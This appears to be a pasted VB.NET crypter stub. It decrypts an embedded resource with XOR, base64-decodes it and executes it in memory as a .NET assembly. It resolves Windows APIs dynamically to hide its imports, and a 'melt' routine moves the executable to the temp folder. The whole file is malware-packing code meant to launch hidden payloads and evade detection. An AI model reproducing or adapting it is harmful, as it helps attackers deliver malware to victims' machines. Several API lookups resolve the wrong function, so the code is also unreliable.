Untitled

Imports System
Imports System.IO
Imports Microsoft.VisualBasic
Imports System.Text
Imports System.Runtime.InteropServices
Imports System.Reflection
Imports System.Runtime.CompilerServices
Namespace Dynam

        Public Class Test


        Public Shared Sub Main()
        Dim testlolrofl() As Byte = {1, 2, 42, 43, 21, 56, 98, 74, 23, 22, 10, 89, 90, 56, 102, 254, 132, 123, 112, 245, 241, 243, 121}
        Dim testlolcopter As Byte() = Decrypt(ReadResource(System.AppDomain.CurrentDomain.BaseDirectory), testlolrofl)
        dim haltdeinmaul as string = System.Text.Encoding.ASCII.GetString(testlolcopter)
        Dim binaryData() As Byte = Convert.FromBase64String(haltdeinmaul.Replace("$", "A"))
        RunFromMemory(binaryData)
        End Sub

        Public Shared Sub RunFromMemory(ByVal bytes As Byte())
        Dim assembly As Reflection.Assembly = assembly.Load(bytes)
        Dim entryPoint As MethodInfo = [assembly].EntryPoint
        Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
        entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})
        End Sub

        Public Shared Function Decrypt(ByVal plain As Byte(), ByVal key As Byte()) As Byte()
            Dim expandedKey As Byte() = ExpandKey(key, plain.Length)
            Dim wholeState As Byte() = plain
            Dim magic As Byte = plain(plain.Length - 1)
            Array.Resize(wholeState, wholeState.Length - 1)

            For hablol As Integer = 0 To wholeState.Length - 1
                wholeState(hablol) = CByte(wholeState(hablol) Xor magic Xor expandedKey(hablol))
            Next

            Return wholeState
        End Function

        Public Shared Function ExpandKey(ByVal key As Byte(), ByVal analfick As Integer) As Byte()
            If key.Length >= analfick Then
                Return key
            End If
            Dim rconst As Byte() = BitConverter.GetBytes(Math.Round(Math.PI, 3))
            Dim result As Byte() = New Byte(analfick - 1) {}
            Buffer.BlockCopy(key, 0, result, 0, key.Length)

            For lolixpx As Integer = key.Length To analfick - 1
                result(lolixpx) = CByte((key((lolixpx - key.Length) Mod key.Length) Xor (result(lolixpx - 1))) Mod 256)
            Next

            For kacken As Integer = 0 To 4
                result(0) = CByte(result(0) Xor rconst(kacken))
                For nuttenkind As Integer = 1 To result.Length - 1
                    result(nuttenkind) = CByte(((result(nuttenkind) Xor CByte(rconst(kacken) << (nuttenkind Mod 3))) Xor result(nuttenkind - 1)) Mod 256)
                Next
            Next
            Return result
        End Function


    End Class
    Module Login
    'Ressourcen
    'Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal moduleName As String) As IntPtr
    'Private Declare Function SizeofResource Lib "kernel32" (ByVal hModule As IntPtr, ByVal hResInfo As IntPtr) As Integer
    'Private Declare Function LoadResource Lib "kernel32" (ByVal hModule As IntPtr, ByVal hResInfo As IntPtr) As IntPtr
    'Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Integer, ByVal lpFileName As String, ByVal nSize As Integer) As Integer
    'Melt File
    Private Declare Function ExitProcess Lib "kernel32" Alias "ExitProcess" (ByVal uExitCode As UInteger) As Integer
    Private Declare Function MoveFile Lib "kernel32" Alias "MoveFileExW" (<[In](), MarshalAs(UnmanagedType.LPTStr)> ByVal lpExistingFileName As String, <[In](), MarshalAs(UnmanagedType.LPTStr)> ByVal lpNewFileName As String, ByVal dwFlags As Long) As Integer

    '<DllImport("kernel32.dll", SetLastError:=True)> _
    'Public Function FindResource(ByVal hModule As IntPtr, ByVal lpName As String, ByVal lpType As String) As IntPtr
    'End Function

    Delegate Function GetModuleHandle(ByVal moduleName As String) As IntPtr
    Delegate Function FindResource(ByVal hModule As IntPtr, ByVal lpName As String, ByVal lpType As String) As IntPtr
    Delegate Function SizeofResource(ByVal hModule As IntPtr, ByVal hResInfo As IntPtr) As IntPtr
    Delegate Function LoadResource(ByVal hModule As IntPtr, ByVal hResInfo As IntPtr) As IntPtr
    Delegate Function GetModuleFileName(ByVal hModule As Integer, ByVal lpFileName As String, ByVal nSize As Integer) As Integer

    Declare Function LoadLibraryA Lib "kernel32" (ByVal name As String) As IntPtr
    Declare Function GetProcAddress Lib "kernel32" (ByVal handle As IntPtr, ByVal name As String) As IntPtr
    'Dynamische API
    Function CreateAPI(Of T)(ByVal name As String, ByVal method As String) As T
    Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), GetType(T)), Object), T)
    End Function

    Public Sub MeltFile()
        MoveFile(Left(System.AppDomain.CurrentDomain.BaseDirectory, GetModuleFileName(0, System.AppDomain.CurrentDomain.BaseDirectory, 256)), System.IO.Path.GetTempPath + "\tmpG" + Date.Now.Millisecond.ToString + ".tmp", 8)
        ExitProcess(0)
    End Sub

    Public Function ReadResource(ByVal filename As String) As Byte()
        Dim fickmodule As GetModuleHandle = CreateAPI(Of GetModuleHandle)("kernel32", "GetModuleHandle")
        fickmodule(filename)
       ' Dim hModule As IntPtr = GetModuleHandle(filename)
        Dim locimoki As FindResource = CreateAPI(Of FindResource)("kernel32", "GetModuleHandle")
        locimoki(fickmodule,"0","RT_RCDATA")
       ' Dim loc As IntPtr = FindResource(fickmodule, "0", "RT_RCDATA")
        Dim lolxit as LoadResource = CreateAPI(Of LoadResource)("kernel32", "GetModuleHandle")
        Dim x As IntPtr = LoadResource(fickmodule, locimoki)
        Dim size as Object = SizeofResource(fickmodule, locimoki)
        Dim bPtr As Byte() = New Byte(size - 1) {}
        Marshal.Copy(x, bPtr, 0, CInt(size))
        Return bPtr
    End Function


    End Module
End Namespace